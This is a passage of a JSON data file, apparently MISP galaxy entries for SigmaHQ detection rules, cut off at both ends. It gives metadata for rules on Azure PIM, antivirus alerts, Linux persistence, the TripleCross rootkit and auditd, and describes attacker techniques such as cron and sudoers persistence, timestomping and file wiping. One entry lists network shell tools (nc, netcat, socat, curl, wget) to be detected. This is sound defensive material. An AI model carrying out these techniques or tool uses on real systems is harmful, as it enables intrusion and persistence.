], "filename": "azure_pim_role_assigned_outside_of_pim.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_assigned_outside_of_pim.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1bc08d1-8224-4758-a0e6-fbcfc98c73bb", "value": "Roles Assigned Outside PIM" }, { "description": "Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2019-03-19", "falsepositive": "No established falsepositives", "filename": "host_without_firewall.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" ], "tags": "No established tags" }, "uuid": "6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9", "value": "Host Without Firewall" }, { "description": "Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\nSigma detects default credentials usage. Sigma for Qualys vulnerability scanner. 
Scan type - Vulnerability Management.\n", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2019-03-26", "falsepositive": [ "Unknown" ], "filename": "default_credentials_usage.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" ], "tags": [ "attack.initial-access" ] }, "uuid": "1a395cbc-a84a-463a-9086-ed8a70e573c7", "value": "Default Credentials Usage" }, { "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels\nEnsure that encryption is used for all sensitive information in transit.\nEnsure that encrypted channels are used for all administrative account access.\n", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2019-03-26", "falsepositive": [ "Unknown" ], "filename": "netflow_cleartext_protocols.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "7e4bfe58-4a47-4709-828d-d86c78b7cc1f", "value": "Cleartext Protocol Usage Via Netflow" }, { "description": "Detects suspicious SQL query keywords that are often used during recon, exfiltration or destructive activities. 
Such as dropping tables and selecting wildcard fields", "meta": { "author": "@juju4", "creation_date": "2022-12-27", "falsepositive": [ "Inventory and monitoring activity", "Vulnerability scanners", "Legitimate applications" ], "filename": "db_anomalous_query.yml", "level": "medium", "logsource.category": "database", "logsource.product": "No established product", "refs": [ "https://github.com/sqlmapproject/sqlmap", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/database/db_anomalous_query.yml" ], "tags": [ "attack.exfiltration", "attack.initial-access", "attack.privilege-escalation", "attack.t1190", "attack.t1505.001" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d84c0ded-edd7-4123-80ed-348bb3ccc4d5", "value": "Suspicious SQL Query" }, { "description": "Detects a highly relevant Antivirus alert that reports a password dumper.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\n", "meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2018-09-09", "falsepositive": [ "Unlikely" ], "filename": "av_password_dumper.yml", "level": "critical", "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619", "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_password_dumper.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1558", 
"attack.t1003.001", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3fc01293-ef5e-41c6-86ce-61f10706b64a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", "value": "Antivirus Password Dumper Detection" }, { "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\n", "meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2018-09-09", "falsepositive": [ "Unlikely" ], "filename": "av_relevant_files.yml", "level": "high", "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ "https://www.nextron-systems.com/?s=antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_relevant_files.yml" ], "tags": [ "attack.resource-development", "attack.t1588" ] }, "related": [ { "dest-uuid": "ce0687a0-e692-4b77-964a-0784a8e54ff1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", "value": "Antivirus Relevant File Paths Alerts" }, { "description": "Detects a highly relevant Antivirus alert that reports ransomware.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\n", 
"meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2022-05-12", "falsepositive": [ "Unlikely" ], "filename": "av_ransomware.yml", "level": "critical", "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7", "https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916", "https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d", "https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c", "https://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05", "https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_ransomware.yml" ], "tags": [ "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", "value": "Antivirus Ransomware Detection" }, { "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\n", "meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2021-08-16", "falsepositive": [ "Unlikely" ], "filename": "av_hacktool.yml", "level": "high", "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ "https://www.nextron-systems.com/?s=antivirus", "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_hacktool.yml" ], "tags": [ "attack.execution", "attack.t1204" ] }, "related": [ { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", "value": "Antivirus Hacktool Detection" }, { "description": "Detects a highly relevant Antivirus alert that reports a web shell.\nIt's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\n", "meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2018-09-09", "falsepositive": [ "Unlikely" ], "filename": "av_webshell.yml", "level": "high", "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", "https://github.com/tennc/webshell", "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", 
"https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", "value": "Antivirus Web Shell Detection" }, { "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\n", "meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2018-09-09", "falsepositive": [ "Unlikely" ], "filename": "av_exploiting.yml", "level": "critical", "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ "https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797", "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466", "https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_exploiting.yml" ], "tags": [ "attack.execution", "attack.t1203", "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", "value": "Antivirus Exploitation 
Framework Detection" }, { "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-05", "falsepositive": [ "Unlikely" ], "filename": "file_event_lnx_triple_cross_rootkit_lock_file.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c0239255-822c-4630-b7f1-35362bcb8f44", "value": "Triple Cross eBPF Rootkit Default LockFile" }, { "description": "Detects creation of cron file or files in Cron directories which could indicate potential persistence.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-10-15", "falsepositive": [ "Any legitimate cron file." 
], "filename": "file_event_lnx_persistence_cron_files.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml" ], "tags": [ "attack.persistence", "attack.t1053.003" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", "value": "Persistence Via Cron Files" }, { "description": "Detects the creation of doas.conf file in linux host platform.", "meta": { "author": "Sittikorn S, Teoderick Contreras", "creation_date": "2022-01-20", "falsepositive": [ "Unlikely" ], "filename": "file_event_lnx_doas_conf_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://www.makeuseof.com/how-to-install-and-use-doas/", "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", "value": "Linux Doas Conf File Creation" }, { "description": "Detects the creation of shell scripts under the \"profile.d\" path.", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Legitimate shell scripts in the \"profile.d\" directory could be common in your environment. 
Apply additional filter accordingly via \"image\", by adding specific filenames you \"trust\" or by correlating it with other events.", "Regular file creation during system update or software installation by the package manager" ], "filename": "file_event_lnx_susp_shell_script_under_profile_directory.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "13f08f54-e705-4498-91fd-cce9d9cee9f1", "value": "Potentially Suspicious Shell Script Creation in Profile Folder" }, { "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. 
Which both are related to the TripleCross persistence method", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-05", "falsepositive": [ "Unlikely" ], "filename": "file_event_lnx_triple_cross_rootkit_persistence.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1053.003" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", "value": "Triple Cross eBPF Rootkit Default Persistence" }, { "description": "Detects the use of wget to download content in a temporary directory such as \"/tmp\" or \"/var/tmp\"", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Legitimate downloads of files in the tmp folder." 
], "filename": "file_event_lnx_wget_download_file_in_tmp_dir.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "35a05c60-9012-49b6-a11f-6bab741c9f74", "value": "Wget Creating Files in Tmp Directory" }, { "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used as a potential method to persist privileges for a specific user.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-05", "falsepositive": [ "Creation of legitimate files in sudoers.d folder part of administrator work" ], "filename": "file_event_lnx_persistence_sudoers_files.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml" ], "tags": [ "attack.persistence", "attack.t1053.003" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", "value": "Persistence Via 
Sudoers Files" }, { "description": "Detects possible command execution by web application/web shell", "meta": { "author": "Ilyas Ochkov, Beyu Denis, oscd.community", "creation_date": "2019-10-12", "falsepositive": [ "Admin activity", "Crazy web applications" ], "filename": "lnx_auditd_web_rce.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "Personal Experience of the Author", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c0d3734d-330f-4a03-aae2-65dacc6a8222", "value": "Webshell Remote Command Execution" }, { "description": "Detects suspicious activities as declared by Florian Roth in his 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands: wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match several techniques from the \"Command and Control\" tactic, including (non-exhaustively) Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095) and Data Encoding (T1132)\n", "meta": { "author": "Marie Euler", "creation_date": "2020-05-18", "falsepositive": [ "Admin or User activity" ], "filename": "lnx_auditd_susp_c2_commands.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/Neo23x0/auditd", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "f7158a64-6204-4d6d-868a-6e6378b467e0", "value": "Suspicious C2 Activities" }, { "description": "Detect changes in auditd configuration files", "meta": { "author": "Mikhail Larin, 
oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate administrative activity" ], "filename": "lnx_auditd_auditing_config_change.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/Neo23x0/auditd/blob/master/audit.rules", "Self Experience", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.006" ] }, "related": [ { "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "977ef627-4539-4875-adf4-ed8f780c4922", "value": "Auditing Configuration Changes on Linux Host" }, { "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-01-23", "falsepositive": [ "Admin activity (especially in /tmp folders)", "Crazy web applications" ], "filename": "lnx_auditd_susp_exe_folders.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml" ], "tags": [ "attack.t1587", "attack.t1584", "attack.resource-development" ] }, "related": [ { "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", "value": "Program Executions in Suspicious Folders" }, { "description": "Detect attempt to enable auditing of TTY input", "meta": { "author": "Pawel Mazur", "creation_date": 
"2021-05-24", "falsepositive": [ "Administrative work" ], "filename": "lnx_auditd_keylogging_with_pam_d.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", "https://access.redhat.com/articles/4409591#audit-record-types-2", "https://linux.die.net/man/8/pam_tty_audit", "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1056.001" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", "value": "Linux Keylogging with Pam.d" }, { "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Legitimate administrator or user uses network sniffing tool for legitimate reasons." 
], "filename": "lnx_auditd_network_sniffing.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml" ], "tags": [ "attack.credential-access", "attack.discovery", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f4d3748a-65d1-4806-bd23-e25728081d01", "value": "Network Sniffing - Linux" }, { "description": "Detects file time attribute changes (timestomping) used to hide newly created files or modifications to existing files.", "meta": { "author": "Igor Fits, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_change_file_time_attr.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.006" ] }, "related": [ { "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", "value": "File Time Attribute Change - Linux" }, { "description": "Detects overwriting (effectively wiping/deleting) of a file.", "meta": { "author": "Jakob Weinzettl, oscd.community", "creation_date": "2019-10-23", "falsepositive": [ "Appending null bytes to files.", "Legitimate overwrite of files." 
], "filename": "lnx_auditd_dd_delete_file.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", "value": "Overwriting the File with Dev Zero or Null" }, { "description": "Detects system information discovery commands", "meta": { "author": "Ömer Günal, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate administration activities" ], "filename": "lnx_auditd_system_info_discovery2.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f358e2e-cb63-43c3-b575-dfb072a6814f", "value": "System and Hardware Information Discovery" }, { "description": "Detects attempts to discover the files with setuid/setgid capability on them. 
That would allow adversary to escalate their privileges.", "meta": { "author": "Pawel Mazur", "creation_date": "2021-11-28", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_capabilities_discovery.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://mn3m.info/posts/suid-vs-capabilities/", "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", "https://man7.org/linux/man-pages/man8/getcap.8.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" ], "tags": [ "attack.collection", "attack.privilege-escalation", "attack.t1123", "attack.t1548" ] }, "related": [ { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", "value": "Linux Capabilities Discovery" }, { "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", "meta": { "author": "Pawel Mazur", "creation_date": "2022-02-03", "falsepositive": [ "Admin work like legit service installs." 
